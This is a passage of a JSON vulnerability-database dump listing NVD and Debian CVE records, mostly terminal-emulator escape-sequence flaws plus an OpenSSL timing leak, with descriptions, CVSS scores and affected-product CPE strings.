"cpe:2.3:o:sgi:irix:6.5.3:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5.4f:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5.10f:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:hp:hp-ux:10.26:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:5.2:*:*:*:*:*:*:*"]}, {"lastseen": "2023-11-28T14:00:43", "description": "ssl3_get_record in s3_pkt.c for OpenSSL before 0.9.7a and 0.9.6 before 0.9.6i does not perform a MAC computation if an incorrect block cipher padding is used, which causes an information leak (timing discrepancy) that may make it easier to launch cryptographic attacks that rely on distinguishing between padding and MAC verification errors, possibly leading to extraction of the original plaintext, aka the \"Vaudenay timing attack.\"", "cvss3": {}, "published": "2003-03-03T05:00:00", "type": "cve", "title": "CVE-2003-0078", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0078"], "modified": "2016-10-18T02:29:00", "cpe": ["cpe:/a:openssl:openssl:0.9.4", "cpe:/a:openssl:openssl:0.9.6", "cpe:/a:openssl:openssl:0.9.6d", "cpe:/a:openssl:openssl:0.9.1c", "cpe:/o:freebsd:freebsd:4.8", "cpe:/o:freebsd:freebsd:4.7", "cpe:/o:freebsd:freebsd:4.3", "cpe:/o:openbsd:openbsd:3.1", "cpe:/o:freebsd:freebsd:5.0", "cpe:/o:freebsd:freebsd:4.4", "cpe:/a:openssl:openssl:0.9.6c", "cpe:/o:freebsd:freebsd:4.2", "cpe:/a:openssl:openssl:0.9.6g", "cpe:/a:openssl:openssl:0.9.6e", "cpe:/a:openssl:openssl:0.9.6a", "cpe:/a:openssl:openssl:0.9.6h", "cpe:/a:openssl:openssl:0.9.2b", "cpe:/a:openssl:openssl:0.9.7", "cpe:/o:openbsd:openbsd:3.2", "cpe:/a:openssl:openssl:0.9.6b", "cpe:/o:freebsd:freebsd:4.6", "cpe:/a:openssl:openssl:0.9.5a", "cpe:/a:openssl:openssl:0.9.3", "cpe:/a:openssl:openssl:0.9.5", "cpe:/o:freebsd:freebsd:4.5"], "id": "CVE-2003-0078", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0078", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:openssl:openssl:0.9.7:beta2:*:*:*:*:*:*", "cpe:2.3:o:openbsd:openbsd:3.2:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.7:beta3:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.1c:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.7:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.7:beta1:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:4.3:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.2b:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.5:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.6e:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.6h:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.6a:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.3:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:4.5:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.6:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:4.7:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:4.4:*:*:*:*:*:*:*", "cpe:2.3:o:openbsd:openbsd:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.6c:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.6d:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.5a:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.6g:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.4:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:4.2:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:4.6:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:4.8:pre-release:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.6b:*:*:*:*:*:*:*"]}, {"lastseen": "2023-11-28T14:00:44", "description": "The DEC UDK processing feature in the xterm terminal emulator in XFree86 4.2.99.4 and earlier allows attackers to cause a denial of service via a certain character escape sequence that causes the terminal to enter a tight loop.", "cvss3": {}, "published": "2003-03-03T05:00:00", "type": "cve", "title": "CVE-2003-0071", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0071"], "modified": "2016-10-18T02:29:00", "cpe": ["cpe:/a:xfree86_project:x11r6:4.0.1", "cpe:/a:xfree86_project:x11r6:4.2.1", "cpe:/a:xfree86_project:x11r6:4.0.3", "cpe:/a:xfree86_project:x11r6:4.2.0", "cpe:/a:xfree86_project:x11r6:4.1.0", "cpe:/a:xfree86_project:x11r6:4.0"], "id": "CVE-2003-0071", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0071", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:xfree86_project:x11r6:4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:xfree86_project:x11r6:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:xfree86_project:x11r6:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:xfree86_project:x11r6:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:xfree86_project:x11r6:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:xfree86_project:x11r6:4.0.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-11-28T14:00:38", "description": "The rxvt terminal emulator 2.7.8 and earlier allows attackers to modify the window title via a certain character escape sequence and then insert it back to the command line in the user's terminal, e.g. when the user views a file containing the malicious sequence, which could allow the attacker to execute arbitrary commands.", "cvss3": {}, "published": "2003-03-03T05:00:00", "type": "cve", "title": "CVE-2003-0066", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0066"], "modified": "2016-10-18T02:29:00", "cpe": ["cpe:/a:rxvt:rxvt:2.6.3", "cpe:/a:rxvt:rxvt:2.7.5", "cpe:/a:rxvt:rxvt:2.6.2", "cpe:/a:rxvt:rxvt:2.7.6", "cpe:/a:rxvt:rxvt:2.7.8", "cpe:/a:rxvt:rxvt:2.6.1", "cpe:/a:rxvt:rxvt:2.6.4", "cpe:/a:rxvt:rxvt:2.7.7"], "id": "CVE-2003-0066", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0066", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:rxvt:rxvt:2.7.6:*:*:*:*:*:*:*", "cpe:2.3:a:rxvt:rxvt:2.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:rxvt:rxvt:2.7.5:*:*:*:*:*:*:*", "cpe:2.3:a:rxvt:rxvt:2.7.7:*:*:*:*:*:*:*", "cpe:2.3:a:rxvt:rxvt:2.7.8:*:*:*:*:*:*:*", "cpe:2.3:a:rxvt:rxvt:2.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:rxvt:rxvt:2.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:rxvt:rxvt:2.6.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-11-28T14:00:38", "description": "The uxterm terminal emulator allows attackers to modify the window title via a certain character escape sequence and then insert it back to the command line in the user's terminal, e.g. when the user views a file containing the malicious sequence, which could allow the attacker to execute arbitrary commands.", "cvss3": {}, "published": "2003-03-03T05:00:00", "type": "cve", "title": "CVE-2003-0065", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0065"], "modified": "2016-10-18T02:29:00", "cpe": ["cpe:/a:national_university_of_singapore:uxterm:2.3", "cpe:/a:national_university_of_singapore:uxterm:2.4.1"], "id": "CVE-2003-0065", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0065", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:national_university_of_singapore:uxterm:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:national_university_of_singapore:uxterm:2.3:*:*:*:*:*:*:*"]}, {"lastseen": "2023-11-28T14:00:35", "description": "The xterm terminal emulator in XFree86 4.2.0 and earlier allows attackers to modify the window title via a certain character escape sequence and then insert it back to the command line in the user's terminal, e.g. when the user views a file containing the malicious sequence, which could allow the attacker to execute arbitrary commands.", "cvss3": {}, "published": "2003-03-03T05:00:00", "type": "cve", "title": "CVE-2003-0063", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0063"], "modified": "2016-10-18T02:28:00", "cpe": ["cpe:/a:xfree86_project:x11r6:4.0.1", "cpe:/a:xfree86_project:x11r6:4.2.1", "cpe:/a:xfree86_project:x11r6:4.0.3", "cpe:/a:xfree86_project:x11r6:4.2.0", "cpe:/a:xfree86_project:x11r6:4.1.0", "cpe:/a:xfree86_project:x11r6:4.0"], "id": "CVE-2003-0063", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0063", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:xfree86_project:x11r6:4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:xfree86_project:x11r6:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:xfree86_project:x11r6:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:xfree86_project:x11r6:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:xfree86_project:x11r6:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:xfree86_project:x11r6:4.0.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-11-28T14:00:40", "description": "The PuTTY terminal emulator 0.53 allows attackers to modify the window title via a certain character escape sequence and then insert it back to the command line in the user's terminal, e.g. when the user views a file containing the malicious sequence, which could allow the attacker to execute arbitrary commands.", "cvss3": {}, "published": "2003-03-18T05:00:00", "type": "cve", "title": "CVE-2003-0069", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0069"], "modified": "2016-10-18T02:29:00", "cpe": ["cpe:/a:putty:putty:0.53"], "id": "CVE-2003-0069", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0069", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:putty:putty:0.53:*:*:*:*:*:*:*"]}, {"lastseen": "2023-11-28T14:00:39", "description": "The aterm terminal emulator 0.42 allows attackers to modify the window title via a certain character escape sequence and then insert it back to the command line in the user's terminal, e.g. when the user views a file containing the malicious sequence, which could allow the attacker to execute arbitrary commands.", "cvss3": {}, "published": "2003-03-18T05:00:00", "type": "cve", "title": "CVE-2003-0067", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0067"], "modified": "2016-10-18T02:29:00", "cpe": ["cpe:/a:aterm:aterm:0.42"], "id": "CVE-2003-0067", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0067", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:aterm:aterm:0.42:*:*:*:*:*:*:*"]}, {"lastseen": "2023-11-28T14:00:34", "description": "The \"screen dump\" feature in Eterm 0.9.1 and earlier allows attackers to overwrite arbitrary files via a certain character escape sequence when it is echoed to a user's terminal, e.g. when the user views a file containing the malicious sequence.", "cvss3": {}, "published": "2003-03-03T05:00:00", "type": "cve", "title": "CVE-2003-0021", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0021"], "modified": "2016-10-18T02:28:00", "cpe": ["cpe:/a:michael_jennings:eterm:0.8.10", "cpe:/a:michael_jennings:eterm:0.9.1"], "id": "CVE-2003-0021", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0021", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:michael_jennings:eterm:0.8.10:*:*:*:*:*:*:*", "cpe:2.3:a:michael_jennings:eterm:0.9.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-11-27T14:18:29", "description": "The vte_sequence_handler_window_manipulation function in vteseq.c in libvte (aka libvte9) in VTE 0.25.1 and earlier, as used in gnome-terminal, does not properly handle escape sequences, which allows remote attackers to execute arbitrary commands or obtain potentially sensitive information via a (1) window title or (2) icon title sequence. NOTE: this issue exists because of a CVE-2003-0070 regression.", "cvss3": {}, "published": "2010-08-05T18:17:00", "type": "cve", "title": "CVE-2010-2713", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0070", "CVE-2010-2713"], "modified": "2010-09-09T05:43:00", "cpe": ["cpe:/a:nalin_dahyabhai:vte:0.16.14", "cpe:/a:nalin_dahyabhai:vte:0.22.5", "cpe:/a:nalin_dahyabhai:vte:0.11.21", "cpe:/a:nalin_dahyabhai:vte:0.25.1", "cpe:/a:nalin_dahyabhai:vte:0.15.0", "cpe:/a:nalin_dahyabhai:vte:0.12.2", "cpe:/a:nalin_dahyabhai:vte:0.14.2", "cpe:/a:nalin_dahyabhai:vte:0.20.5", "cpe:/a:nalin_dahyabhai:vte:0.24.3", "cpe:/a:nalin_dahyabhai:vte:0.17.4"], "id": "CVE-2010-2713", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2713", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:nalin_dahyabhai:vte:0.16.14:*:*:*:*:*:*:*", "cpe:2.3:a:nalin_dahyabhai:vte:0.14.2:*:*:*:*:*:*:*", "cpe:2.3:a:nalin_dahyabhai:vte:0.17.4:*:*:*:*:*:*:*", "cpe:2.3:a:nalin_dahyabhai:vte:0.24.3:*:*:*:*:*:*:*", "cpe:2.3:a:nalin_dahyabhai:vte:0.15.0:*:*:*:*:*:*:*", "cpe:2.3:a:nalin_dahyabhai:vte:0.20.5:*:*:*:*:*:*:*", "cpe:2.3:a:nalin_dahyabhai:vte:0.12.2:*:*:*:*:*:*:*", "cpe:2.3:a:nalin_dahyabhai:vte:0.11.21:*:*:*:*:*:*:*", "cpe:2.3:a:nalin_dahyabhai:vte:0.25.1:*:*:*:*:*:*:*", "cpe:2.3:a:nalin_dahyabhai:vte:0.22.5:*:*:*:*:*:*:*"]}, {"lastseen": "2023-11-08T18:45:59", "description": "Mutagen provides real-time file synchronization and flexible network forwarding for developers. Prior to versions 0.16.6 and 0.17.1 in `mutagen` and prior to version 0.17.1 in `mutagen-compose`, Mutagen `list` and `monitor` commands are susceptible to control characters that could be provided by remote endpoints. This could cause terminal corruption, either intentional or unintentional, if these characters were present in error messages or file paths/names. This could be used as an attack vector if synchronizing with an untrusted remote endpoint, synchronizing files not under control of the user, or forwarding to/from an untrusted remote endpoint. On very old systems with terminals susceptible to issues such as CVE-2003-0069, the issue could theoretically cause code execution. The problem has been patched in Mutagen v0.16.6 and v0.17.1. Earlier versions of Mutagen are no longer supported and will not be patched. Versions of Mutagen after v0.18.0 will also have the patch merged. As a workaround, avoiding synchronization of untrusted files or interaction with untrusted remote endpoints should mitigate any risk.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-05-08T18:15:00", "type": "cve", "title": "CVE-2023-30844", "cwe": ["CWE-116"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0069", "CVE-2023-30844"], "modified": "2023-05-15T18:07:00", "cpe": ["cpe:/a:mutagen:mutagen:0.17.0"], "id": "CVE-2023-30844", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-30844", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:mutagen:mutagen:0.17.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-11-29T15:06:27", "description": "Terminology 0.7.0 allows remote attackers to execute arbitrary commands via escape sequences that modify the window title and then are written to the terminal, a similar issue to CVE-2003-0063.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-01-23T21:59:00", "type": "cve", "title": "CVE-2015-8971", "cwe": ["CWE-77"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0063", "CVE-2015-8971"], "modified": "2020-02-24T19:44:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "cpe:/a:enlightenment:terminology:0.7.0"], "id": "CVE-2015-8971", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8971", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:enlightenment:terminology:0.7.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-11-29T21:47:33", "description": "Apache 1.3 before 1.3.25 and Apache 2.0 before version 2.0.46 does not filter terminal escape sequences from its access logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences, a different vulnerability than CVE-2003-0020.", "cvss3": {}, "published": "2003-04-02T05:00:00", "type": "cve", "title": "CVE-2003-0083", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0020", "CVE-2003-0083"], "modified": "2023-11-07T01:56:13", "cpe": [], "id": "CVE-2003-0083", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0083", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": []}], "debiancve": [{"lastseen": "2023-11-28T22:33:46", "description": "CRLF injection vulnerability in xterm allows user-assisted attackers to execute arbitrary commands via LF (aka \\n) characters surrounding a command name within a Device Control Request Status String (DECRQSS) escape sequence in a text file, a related issue to CVE-2003-0063 and CVE-2003-0071.", "cvss3": {}, "published": "2009-01-02T18:11:09", "type": "debiancve", "title": "CVE-2008-2383", "bulletinFamily": "info", "cvss2": {"baseSeverity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": true, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0063", "CVE-2003-0071", "CVE-2008-2383"], "modified": "2009-01-02T18:11:09", "id": "DEBIANCVE:CVE-2008-2383", "href": "https://security-tracker.debian.org/tracker/CVE-2008-2383", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T17:52:34", "description": "The menuBar feature in rxvt 2.7.8 allows attackers to modify menu options and execute arbitrary commands via a certain character escape sequence that inserts the commands into the menu.", "cvss3": {}, "published": "2003-03-03T05:00:00", "type": "debiancve", "title": "CVE-2003-0023", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0023"], "modified": "2003-03-03T05:00:00", "id": "DEBIANCVE:CVE-2003-0023", "href": "https://security-tracker.debian.org/tracker/CVE-2003-0023", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-11-28T15:16:49", "description": "The \"screen dump\" feature in Eterm 0.9.1 and earlier allows attackers to overwrite arbitrary files via a certain character escape sequence when it is echoed to a user's terminal, e.g. when the user views a file containing the malicious sequence.", "cvss3": {}, "published": "2003-03-03T05:00:00", "type": "debiancve", "title": "CVE-2003-0021", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0021"], "modified": "2003-03-03T05:00:00", "id": "DEBIANCVE:CVE-2003-0021", "href": "https://security-tracker.debian.org/tracker/CVE-2003-0021", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-11-28T15:16:49", "description": "The Eterm terminal emulator 0.9.1 and earlier allows attackers to modify the window title via a certain character escape sequence and then insert it back to the command line in the user's terminal, e.g. when the user views a file containing the malicious sequence, which could allow the attacker to execute arbitrary commands.", "cvss3": {}, "published": "2003-03-03T05:00:00", "type": "debiancve", "title": "CVE-2003-0068", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0068"], "modified": "2003-03-03T05:00:00", "id": 